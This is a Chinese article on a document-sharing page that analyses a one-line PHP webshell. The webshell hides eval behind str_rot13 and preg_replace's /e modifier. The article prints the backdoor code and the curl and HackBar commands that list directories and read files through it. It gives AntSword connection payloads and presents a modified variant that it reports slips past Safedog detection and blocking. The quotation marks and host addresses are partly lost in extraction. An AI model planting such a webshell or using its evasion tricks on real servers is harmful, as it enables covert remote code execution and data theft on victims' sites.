PHP一句话木马分析.pdfVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多

一只有趣的PHP小马

11/15/2019

最近看到一个php后门,后门代码如下,感觉还是很强大的,后门代码如

下:

?php($b4dboy=$_POST[b4dboy])

@preg_replace(/ad/e,@.str_rot13(riny).($b4dboy),add);?

免杀效果

乍一看还真不知道该怎么去利用,查了下相关资料,首先利用D盾去扫描

提示,如下

只是发现可以的str_rot13函数且级别只是1,在线检测了下,只有两个杀

软报毒,免杀还是很不错的,

安全狗还是能查杀出来的,并且会对菜刀和蚁剑连接进行拦截,所以在扫

描web马时,除了D盾外,也可以试试安全狗。

小马介绍

能过这么多杀软主要是因为利用了str_rot13函数,str_rot13(riny)输

出为eval,还有一个利用了preg_replace函数,该函数结构如下

preg_replace(mixedpattern,mixedreplacement,mixedsubject

[,intlimit])

/e修正符使preg_replace()将replacement参数当作PHP代

码来执行,要保证replacement构成一个合法的PHP代码字符串,该正

则在被正确的匹配到后,传入的string被当做函数来运行。

测试发现该后门可用于php版本5.3、5.4;PHP5.5.0起,传入\e修

饰符的时候,会产生一个E_DEPRECATED错误;PHP7.0.0起,会

有E_WARNING错误,同时\e也无法起效。

小马连接方式

利用hackerbar连接

此处传入的system(ls),可成功返回数据,如下图

在利用file_get_contents在进行文件读取时发现,利用echo无法打印,

但是print可以

利用curl连接

利用curl扫描目录获取相关信息:

curl31/test1.php--datab4dboy=print_r

(scandir(/var/www/html,1))

读取文件内容:

curl31/test1.php--datab4dboy=print

file_get_contents(cookie.txt)

curl31/test1.php--datab4dboy=\echo

file_get_contents(cookie.txt);\

中国蚁剑连接

先来看下蚁剑这个payload:

b4dboy=(eval($_POST[1]);)1=var_dump(1);需要配置下蚁剑的body

才能连接

拦截蚁剑连接shell的数据包,本次抓取的获取phpinfo信息的数据包,

精简后数据包如下:

在连接其他shell的时候直接指定密码即可,不需要指定body,常规的一

句话马获取phpinfo拦截数据包如下可返回正常数据:

本次测试的后门利用该方法获取info,只是返回200,但无相关内容

但是将数据包改为123=phpinfo();die();b4dboy=(eval($_POST[123])),

即可成功返回数据

一直在纠结为什么必须要在post包中在增加个eval呢,通过本地测试发

现,如果不加的话输出如下,发现preg_replace函数语法错误

如果手动加上eval后,preg_replace函数相当于直接输出了执行后的结

果,也就不会报错了

小马改良版

那么这样的话是不是把后门中的eval删除,也能利用蚁剑连接成功?后门

修改如下确实可连接成功

先开启安全狗检测下看看,竟然没有检测出来,哈哈

然后连接下试试,安全狗竟然没有拦截,蚁剑可以成功连接。。。。。

利用hackerbar也可以正常获取文件

但是在利用file_get_contents()函数进行文件读取时,发现竟然没有数

文档评论(0)

WZR1 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档